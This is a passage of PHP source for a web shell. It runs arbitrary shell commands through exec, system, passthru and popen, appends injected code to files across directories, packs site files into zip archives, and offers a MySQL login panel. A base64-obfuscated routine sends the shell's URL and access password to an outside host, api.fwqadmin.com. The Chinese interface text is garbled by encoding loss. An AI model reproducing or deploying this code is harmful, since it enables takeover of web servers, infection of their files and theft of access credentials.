array(\'UTF-8\',\'ASCII\',\'GBK\',\'GB2312\',\'BIG5\',\'JIS\',\'eucjp-win\',\'sjis-win\',\'EUC-JP\');  \r\n    $encoded = mb_detect_encoding($data, $encode_arr);  \r\n  \r\n    if (!is_array($data)) {  \r\n        return mb_convert_encoding($data, $output, $encoded);  \r\n    }  \r\n    else {  \r\n        foreach ($data as $key=>$val) {  \r\n            $key = array_iconv($key, $output);  \r\n            if(is_array($val)) {  \r\n                $data[$key] = array_iconv($val, $output);  \r\n            } else {  \r\n            $data[$key] = mb_convert_encoding($data, $output, $encoded);  \r\n            }  \r\n        }  \r\n    return $data;  \r\n    }  \r\n}\r\n\r\nfunction Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}\r\nfunction Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}\r\n\r\nfunction do_phpfun($cmd,$fun) {\r\n\t$res = \'\';\r\n\tswitch($fun){\r\n\t\tcase "exec": @exec($cmd,$res); $res = join("\\n",$res); break;\r\n\t\tcase "shell_exec": $res = @shell_exec($cmd); break;\r\n\t\tcase "system": @ob_start();\t@system($cmd); $res = @ob_get_contents();\t@ob_end_clean();break;\r\n\t\tcase "passthru": @ob_start();\t@passthru($cmd); $res = @ob_get_contents();\t@ob_end_clean();break;\r\n\t\tcase "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f))\t$res .= @fread($f,1024);} @pclose($f);break;\r\n\t}\r\n\treturn $res;\r\n}\r\n\r\nif(isset($_GET[\'login\'])==\'geturl\'){\r\n    @set_time_limit(10);\r\n\t$serveru = $_SERVER [\'HTTP_HOST\'].$_SERVER[\'PHP_SELF\'];\r\n    $serverp = postpass;\r\n    $copyurl = base64_decode(\'aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA\');\r\n    $url=$copyurl.$serveru.\'&passwd=\'.$serverp;\r\n    $url=urldecode($url);\r\n    GetHtml($url);\r\n}\r\n\r\nfunction geturl(){\r\n    @set_time_limit(10);\r\n\t$serveru = $_SERVER [\'HTTP_HOST\'].$_SERVER[\'PHP_SELF\'];\r\n    $serverp = postpass;\r\n    $copyurl = base64_decode(\'aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA\');\r\n    $url=$copyurl.$serveru.\'&passwd=\'.$serverp;\r\n    $url=urldecode($url);\r\n    GetHtml($url);\r\n}\r\n\r\nfunction do_passreturn($dir,$code,$type,$bool,$filetype = \'\',$shell = my_shell){\r\n\t$show = do_show($dir);\r\n\tforeach($show as $files){\r\n\t\tif(is_dir($files) && $bool){\r\n\t\t\tdo_passreturn($files,$code,$type,$bool,$filetype,$shell);\r\n\t\t}else{\r\n\t\t\tif($files == $shell) continue;\r\n\t\t\tswitch($type){\r\n\t\t\t\tcase "guama":\r\n\t\t\t\tif(debug($files,$filetype)){\r\n\t\t\t\t\tdo_write($files,"ab","\\n".$code) ? html_n("ɹ--> $files<br>") : html_n("ʧ--> $files<br>");\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "qingma":\r\n\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\tif(stristr($filecode,$code)){\r\n\t\t\t\t\t$newcode = str_replace($code,\'\',$filecode);\r\n\t\t\t\t\tdo_write($files,"wb",$newcode) ? html_n("ɹ--> $files<br>") : html_n("ʧ--> $files<br>");\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "tihuan":\r\n\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\tif(stristr($filecode,$code)){\r\n\t\t\t\t\t$newcode = str_replace($code,$filetype,$filecode);\r\n\t\t\t\t\tdo_write($files,"wb",$newcode) ? html_n("ɹ--> $files<br>") : html_n("ʧ--> $files<br>");\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "scanfile":\r\n\t\t\t\t$file = explode(\'/\',$files);\r\n\t\t\t\tif(stristr($file[count($file)-1],$code)){\r\n\t\t\t\t\thtml_a("?eanver=editr&p=$files",$files);\r\n\t\t\t\t\techo \'<br>\';\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "scancode":\r\n\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\tif(stristr($filecode,$code)){\r\n\t\t\t\t\thtml_a("?eanver=editr&p=$files",$files);\r\n\t\t\t\t\techo \'<br>\';\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase "scanphp":\r\n\t\t\t\t$fileinfo = pathinfo($files);\r\n\t\t\t\tif($fileinfo[\'extension\'] == $code){\r\n\t\t\t\t\t$filecode = @file_get_contents($files);\r\n\t\t\t\t\tif(muma($filecode,$code)){\r\n\t\t\t\t\t\thtml_a("?eanver=editr&p=".urlencode($files),"༭");\r\n\t\t\t\t\t\thtml_a("?eanver=del&p=".urlencode($files),"ɾ");\r\n\t\t\t\t\t\techo $files.\'<br>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\r\n\r\nclass PHPzip{\r\n\r\n\tvar $file_count = 0 ;\r\n\tvar $datastr_len   = 0;\r\n\tvar $dirstr_len = 0;\r\n\tvar $filedata = \'\';\r\n\tvar $gzfilename;\r\n\tvar $fp;\r\n\tvar $dirstr=\'\';\r\n\r\n    function unix2DosTime($unixtime = 0) {\r\n        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);\r\n\r\n        if ($timearray[\'year\'] < 1980) {\r\n        \t$timearray[\'year\']    = 1980;\r\n        \t$timearray[\'mon\']     = 1;\r\n        \t$timearray[\'mday\']    = 1;\r\n        \t$timearray[\'hours\']   = 0;\r\n        \t$timearray[\'minutes\'] = 0;\r\n        \t$timearray[\'seconds\'] = 0;\r\n        }\r\n\r\n        return (($timearray[\'year\'] - 1980) << 25) | ($timearray[\'mon\'] << 21) | ($timearray[\'mday\'] << 16) |\r\n               ($timearray[\'hours\'] << 11) | ($timearray[\'minutes\'] << 5) | ($timearray[\'seconds\'] >> 1);\r\n    }\r\n\r\n\tfunction startfile($path = "web.zip"){\r\n\t\t$this->gzfilename=$path;\r\n\t\t$mypathdir=array();\r\n\t\tdo{\r\n\t\t\t$mypathdir[] = $path = dirname($path);\r\n\t\t}while($path != \'.\');\r\n\t\t@end($mypathdir);\r\n\t\tdo{\r\n\t\t\t$path = @current($mypathdir);\r\n\t\t\t@mkdir($path);\r\n\t\t}while(@prev($mypathdir));\r\n\r\n\t\tif($this->fp=@fopen($this->gzfilename,"w")){\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\treturn false;\r\n\t}\r\n\r\n    function addfile($data, $name){\r\n        $name     = str_replace(\'\\\\\', \'/\', $name);\r\n\t\t\r\n\t\tif(strrchr($name,\'/\')==\'/\') return $this->adddir($name);\r\n\t\t\r\n        $dtime    = dechex($this->unix2DosTime());\r\n        $hexdtime = \'\\x\' . $dtime[6] . $dtime[7]\r\n                  . \'\\x\' . $dtime[4] . $dtime[5]\r\n                  . \'\\x\' . $dtime[2] . $dtime[3]\r\n                  . \'\\x\' . $dtime[0] . $dtime[1];\r\n        eval(\'$hexdtime = "\' . $hexdtime . \'";\');\r\n\r\n        $unc_len = strlen($data);\r\n        $crc     = crc32($data);\r\n        $zdata   = gzcompress($data);\r\n        $c_len   = strlen($zdata);\r\n        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);\r\n\t\t\r\n        $datastr  = "\\x50\\x4b\\x03\\x04";\r\n        $datastr .= "\\x14\\x00"; \r\n        $datastr .= "\\x00\\x00";\r\n        $datastr .= "\\x08\\x00"; \r\n        $datastr .= $hexdtime; \r\n        $datastr .= pack(\'V\', $crc);\r\n        $datastr .= pack(\'V\', $c_len);\r\n        $datastr .= pack(\'V\', $unc_len);\r\n        $datastr .= pack(\'v\', strlen($name));\r\n        $datastr .= pack(\'v\', 0); \r\n        $datastr .= $name;\r\n        $datastr .= $zdata;\r\n        $datastr .= pack(\'V\', $crc); \r\n        $datastr .= pack(\'V\', $c_len);\r\n        $datastr .= pack(\'V\', $unc_len);\r\n\r\n\r\n\t\tfwrite($this->fp,$datastr);\r\n\t\t$my_datastr_len = strlen($datastr);\r\n\t\tunset($datastr);\r\n\t\t\r\n        $dirstr  = "\\x50\\x4b\\x01\\x02";\r\n        $dirstr .= "\\x00\\x00"; \r\n        $dirstr .= "\\x14\\x00";\r\n        $dirstr .= "\\x00\\x00";\r\n        $dirstr .= "\\x08\\x00";\r\n        $dirstr .= $hexdtime;\r\n        $dirstr .= pack(\'V\', $crc); \r\n        $dirstr .= pack(\'V\', $c_len); \r\n        $dirstr .= pack(\'V\', $unc_len); \r\n        $dirstr .= pack(\'v\', strlen($name) ); \r\n        $dirstr .= pack(\'v\', 0 );  \r\n        $dirstr .= pack(\'v\', 0 );   \r\n        $dirstr .= pack(\'v\', 0 );   \r\n        $dirstr .= pack(\'v\', 0 );    \r\n        $dirstr .= pack(\'V\', 32 );   \r\n        $dirstr .= pack(\'V\',$this->datastr_len ); \r\n        $dirstr .= $name;\r\n\t\t\r\n\t\t$this->dirstr .= $dirstr;\r\n\t\t\r\n\t\t$this -> file_count ++;\r\n\t\t$this -> dirstr_len += strlen($dirstr);\r\n\t\t$this -> datastr_len += $my_datastr_len;\t\r\n    }\r\n\r\n\tfunction adddir($name){ \r\n\t\t$name = str_replace("\\\\", "/", $name); \r\n\t\t$datastr = "\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"; \r\n\t\t\r\n\t\t$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); \r\n\t\t$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); \r\n\r\n\t\tfwrite($this->fp,$datastr);\t\r\n\t\t$my_datastr_len = strlen($datastr);\r\n\t\tunset($datastr);\r\n\t\t\r\n\t\t$dirstr = "\\x50\\x4b\\x01\\x02\\x00\\x00\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"; \r\n\t\t$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); \r\n\t\t$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); \r\n\t\t$dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name; \r\n\t\t\r\n\t\t$this->dirstr .= $dirstr;\r\n\r\n\t\t$this -> file_count ++;\r\n\t\t$this -> dirstr_len += strlen($dirstr);\r\n\t\t$this -> datastr_len += $my_datastr_len;\t\r\n\t}\r\n\r\n\r\n\tfunction createfile(){\r\n\t\t$endstr = "\\x50\\x4b\\x05\\x06\\x00\\x00\\x00\\x00" .\r\n\t\t\t\t\tpack(\'v\', $this -> file_count) .\r\n\t\t\t\t\tpack(\'v\', $this -> file_count) .\r\n\t\t\t\t\tpack(\'V\', $this -> dirstr_len) .\r\n\t\t\t\t\tpack(\'V\', $this -> datastr_len) .\r\n\t\t\t\t\t"\\x00\\x00";\r\n\r\n\t\tfwrite($this->fp,$this->dirstr.$endstr);\r\n\t\tfclose($this->fp);\r\n\t}\r\n }\r\n\r\n\r\nfunction start_unzip($tmp_name,$new_name,$todir=\'zipfile\'){\r\n$zip = new ZipArchive() ;\r\nif ($zip->open($tmp_name) !== TRUE) {\r\necho \'Ǹѹ޷򿪻\';\r\n}\r\n$zip->extractTo($todir);\r\n$zip->close();\r\necho \'ѹϣ&nbsp;&nbsp;&nbsp;<a href="?eanver=main&path=\'.urlencode($todir).\'">ѹĿ¼</a>&nbsp;&nbsp;&nbsp;<a href="javascript:history.go(-1);"></a>\';\r\n}\r\n\r\nfunction muma($filecode,$filetype){\r\n\t$dim = array(\r\n\t"php" => array("eval(","exec("),\r\n\t"asp" => array("WScript.Shell","execute(","createtextfile("),\r\n\t"aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),\r\n\t"jsp" => array("runtime.exec(")\r\n\t);\r\n\tforeach($dim[$filetype] as $code){\r\n\t\tif(stristr($filecode,$code)) return true;\r\n\t}\r\n}\r\n\r\nfunction debug($file,$ftype){\r\n\t$type=explode(\'|\',$ftype);\r\n\tforeach($type as $i){\r\n\t\tif(stristr($file,$i))\treturn true;\r\n\t}\r\n}\r\n\r\n/*---string---*/\r\n\r\nfunction str_path($path){\r\n\treturn str_replace(\'//\',\'/\',$path);\r\n}\r\n\r\nfunction msg($msg){\r\n\tdie("<script>window.alert(\'".$msg."\');history.go(-1);</script>");\r\n}\r\n\r\nfunction uppath($nowpath){\r\n\t$nowpath = str_replace(\'\\\\\',\'/\',dirname($nowpath));\r\n\treturn urlencode($nowpath);\r\n}\r\n\r\nfunction xxstr($key){\r\n\t$temp = str_replace("\\\\\\\\","\\\\",$key);\r\n\t$temp = str_replace("\\\\","\\\\\\\\",$temp);\r\n\treturn $temp;\r\n}\r\n\r\n/*---html---*/\r\n\r\nfunction html_ta($url,$name){\r\n\thtml_n("<a href=\\"$url\\" target=\\"_blank\\">$name</a>");\r\n}\r\n\r\nfunction html_a($url,$name,$where=\'\'){\r\n\thtml_n("<a href=\\"$url\\" $where>$name</a> ");\r\n}\r\n\r\nfunction html_img($url){\r\n\thtml_n("<img src=\\"?img=$url\\" border=0>");\r\n}\r\n\r\nfunction back(){\r\n\thtml_n("<input type=\'button\' value=\'\' onclick=\'history.back();\'>");\r\n}\r\n\r\nfunction html_radio($namei,$namet,$v1,$v2){\r\n\thtml_n(\'<input type="radio" name="return" value="\'.$v1.\'" checked>\'.$namei);\r\n\thtml_n(\'<input type="radio" name="return" value="\'.$v2.\'">\'.$namet.\'<br><br>\');\r\n}\r\n\r\nfunction html_input($type,$name,$value = \'\',$text = \'\',$size = \'\',$mode = false){\r\n\tif($mode){\r\n\t\thtml_n("<input type=\\"$type\\" name=\\"$name\\" value=\\"$value\\" size=\\"$size\\" checked>$text");\r\n\t}else{\r\n\t\thtml_n("$text <input type=\\"$type\\" name=\\"$name\\" value=\\"$value\\" size=\\"$size\\">");\r\n\t}\r\n}\r\n\r\nfunction html_base(){\r\nhtml_n(\'function base64encode(str){\r\n\tvar base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";\r\n    var out, i, len;\r\n    var c1, c2, c3;\r\n    len = str.length;\r\n    i = 0;\r\n    out = "";\r\n    while (i < len) {\r\n        c1 = str.charCodeAt(i++) & 0xff;\r\n        if (i == len) {\r\n            out += base64EncodeChars.charAt(c1 >> 2);\r\n            out += base64EncodeChars.charAt((c1 & 0x3) << 4);\r\n            out += "==";\r\n            break;\r\n        }\r\n        c2 = str.charCodeAt(i++);\r\n        if (i == len) {\r\n            out += base64EncodeChars.charAt(c1 >> 2);\r\n            out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));\r\n            out += base64EncodeChars.charAt((c2 & 0xF) << 2);\r\n            out += "=";\r\n            break;\r\n        }\r\n        c3 = str.charCodeAt(i++);\r\n        out += base64EncodeChars.charAt(c1 >> 2);\r\n        out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));\r\n        out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));\r\n        out += base64EncodeChars.charAt(c3 & 0x3F);\r\n    }\r\n    return out;\r\n}\r\nfunction utf16to8(str) {\r\nvar out, i, len, c;\r\nout = "";\r\nlen = str.length;\r\nfor(i = 0; i < len; i++) {\r\nc = str.charCodeAt(i);\r\nif ((c >= 0x0001) && (c <= 0x007F)) {\r\nout += str.charAt(i);\r\n} else if (c > 0x07FF) {\r\nout += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));\r\nout += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));\r\nout += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));\r\n} else {\r\nout += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));\r\nout += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));\r\n}\r\n}\r\nreturn out;\r\n}\r\nfunction utf8to16(str) {\r\n  var out, i, len, c;\r\n  var char2, char3;\r\n  out = "";\r\n  len = str.length;\r\n  i = 0;\r\n  while(i < len) {\r\n    c = str.charCodeAt(i++);\r\n    switch(c >> 4) {\r\n      case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:\r\n        out += str.charAt(i-1);\r\n        break;\r\n      case 12: case 13:\r\n        char2 = str.charCodeAt(i++);\r\n        out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));\r\n        break;\r\n      case 14:\r\n        char2 = str.charCodeAt(i++);\r\n        char3 = str.charCodeAt(i++);\r\n        out += String.fromCharCode(((c & 0x0F) << 12) |\r\n        ((char2 & 0x3F) << 6) |\r\n        ((char3 & 0x3F) << 0));\r\n        break;\r\n    }\r\n  }\r\n  return out;\r\n}\r\n\');\r\n}\r\n\r\nfunction html_text($name,$cols,$rows,$value = \'\'){\r\n\thtml_n("<br><br><textarea name=\\"$name\\" COLS=\\"$cols\\" ROWS=\\"$rows\\" >$value</textarea>");\r\n}\r\n\r\nfunction html_select($array,$mode = \'\',$change = \'\',$name = \'class\'){\r\n\thtml_n("<select name=$name $change>");\r\n\tforeach($array as $name => $value){\r\n\t\tif($name == $mode){\r\n\t\t\thtml_n("<option value=\\"$name\\" selected>$value</option>");\r\n\t\t}else{\r\n\t\t\thtml_n("<option value=\\"$name\\">$value</option>");\r\n\t\t}\r\n\t}\r\n\thtml_n("</select>");\r\n}\r\n\r\nfunction html_font($color,$size,$name){\r\n\thtml_n("<font color=\\"$color\\" size=\\"$size\\">$name</font>");\r\n}\r\n\r\nfunction GetHtml($url)\r\n{\r\n      $c = \'\';\r\n      $useragent = \'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\';\r\n      if(function_exists(\'fsockopen\')){\r\n    \t$link = parse_url($url);\r\n\t    $query=$link[\'path\'].\'?\'.$link[\'query\'];\r\n\t    $host=strtolower($link[\'host\']);\r\n\t    $port=$link[\'port\'];\r\n\t    if($port==""){$port=80;}\r\n\t    $fp = fsockopen ($host,$port, $errno, $errstr, 10);\r\n\t    if ($fp)\r\n\t      {\r\n\t\t    $out = "GET /{$query} HTTP/1.0\\r\\n"; \r\n\t\t    $out .= "Host: {$host}\\r\\n"; \r\n\t\t    $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\\r\\n"; \r\n\t\t    $out .= "Connection: Close\\r\\n\\r\\n"; \r\n\t\t    fwrite($fp, $out);\r\n\t\t    $inheader=1;\r\n\t\t    while(!feof($fp)) \r\n\t\t         {$line=fgets($fp,4096);\t\r\n\t\t\t      if($inheader==0){$contents.=$line;}\r\n\t\t\t      if ($inheader &&($line=="\\n"||$line=="\\r\\n")){$inheader = 0;}\r\n\t\t    } \r\n\t\t    fclose ($fp); \r\n\t\t    $c= $contents;\r\n\t      }\r\n        }\r\n\t\tif(empty($c) && function_exists(\'curl_init\') && function_exists(\'curl_exec\')){\r\n            $ch = curl_init();\r\n            curl_setopt($ch, CURLOPT_URL, $url);\r\n            curl_setopt($ch, CURLOPT_TIMEOUT, 15);\r\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);\r\n            curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n            $c = curl_exec($ch);\r\n            curl_close($ch);\r\n        }\r\n        if(empty($c) && ini_get(\'allow_url_fopen\')){\r\n            $c = file_get_contents($url);\r\n        }\r\n\t\tif(empty($c)){\r\n            echo "document.write(\'<DIV style=\\\'CURSOR:url(\\"$url\\")\\\'>\');";\r\n        }\r\n\t\tif(!empty($c))\r\n\t\t{\r\n        return $c;\r\n\t\t}\r\n }\r\n\r\nfunction html_main($path,$shellname){\r\n$serverip=gethostbyname($_SERVER[\'SERVER_NAME\']);\r\nprint<<<END\r\n<html><title>{$shellname}</title>\r\n<table width=\'100%\'><tr><td width=\'150\' align=\'center\'>{$serverip}</td><td><form method=\'GET\' target=\'main\'><input type=\'hidden\' name=\'eanver\' value=\'main\'><input name=\'path\' style=\'width:100%\' value=\'{$path}\'></td><td width=\'140\' align=\'center\'><input name=\'Submit\' type=\'submit\' value=\'\'> <input type=\'submit\' value=\'ˢ\' onclick=\'main.location.reload()\'></td></tr></form></table>\r\nEND;\r\n\thtml_n("<table width=\'100%\' height=\'95.7%\' border=0 cellpadding=\'0\' cellspacing=\'0\'><tr><td width=\'170\'><iframe name=\'left\' src=\'?eanver=left\' width=\'100%\' height=\'100%\' frameborder=\'0\'>");\r\n\thtml_n("</iframe></td><td><iframe name=\'main\' src=\'?eanver=main\' width=\'100%\' height=\'100%\' frameborder=\'1\'>");\r\n\thtml_n("</iframe></td></tr></table></html>");\r\n}\r\n\r\nfunction islogin($shellname,$myurl){\r\nprint<<<END\r\n<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style>\r\n<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style=\'width:500px;border:1px solid #222;padding:22px;margin:100px;\'><br><a href=\'{$myurl}\' target=\'_blank\'>{$shellname}</a><br><br><form method=\'post\'>룺<input name=\'postpass\' type=\'password\' size=\'22\'> <input type=\'submit\' value=\'½\'><br><br><br><font color=#3399FF>ڷǷ;߸Ų</font><br></div></center>\r\nEND;\r\n}\r\n\r\nfunction html_sql(){\r\n\thtml_input("text","sqlhost","localhost","<br>MYSQLַ","30");\r\n\thtml_input("text","sqlport","3306","<br>MYSQL˿","30");\r\n\thtml_input("text","sqluser","root","<br>MYSQLû","30");\r\n\thtml_input("password","sqlpass","","<br>MYSQL","30");\r\n\thtml_input("text","sqldb","dbname","<br>MYSQL","30");\r\n\thtml_input("submit","sqllogin","½","<br>");\r\n\thtml_n(\'</form>\');\r\n}\r\n\r\nfunction Mysql_Len($data,$len)\r\n{\r\n\tif(strlen($data) < $len) return $data;\r\n\treturn substr_replace($data,\'...\',$len);\r\n}\r\n\r\nfunction html_n($data){\r\n\techo "$data\\n";\r\n}\r\n\r\n/*---css---*/\r\n\r\nfunction css_img($img){\r\n\t$images = array(\r\n\t"exe"=>\r\n\t"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".\r\n\t"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".\r\n\t"xhIAOw==",\r\n\t"dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA".\r\n\t"AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE".\r\n\t"oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",\r\n\t"txt"=>\r\n\t"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".\r\n\t"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".\r\n\t"UpPWG3Ig6Hq/XmRjuZwkAAA7",\r\n\t"html"=>\r\n\t"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".\r\n\t"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".\r\n\t"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".\r\n\t"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".\r\n\t"ADs=",\r\n\t"js"=>\r\n\t"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".\r\n\t"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".\r\n\t"a00AjYYBbc/o9HjNniUAADs=",\r\n\t"xml"=>\r\n\t"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".\r\n\t"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n\t"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".\r\n\t"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".\r\n\t"IQA7",\r\n\t"mp3"=>\r\n\t"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".\r\n\t"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".\r\n\t"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",\r\n\t"img"=>\r\n\t"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".\r\n\t"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".\r\n\t"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".\r\n\t"FxEAOw==",\r\n\t"title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+".\r\n\t"mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n\t"ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL".\r\n\t"I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",\r\n\t"rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    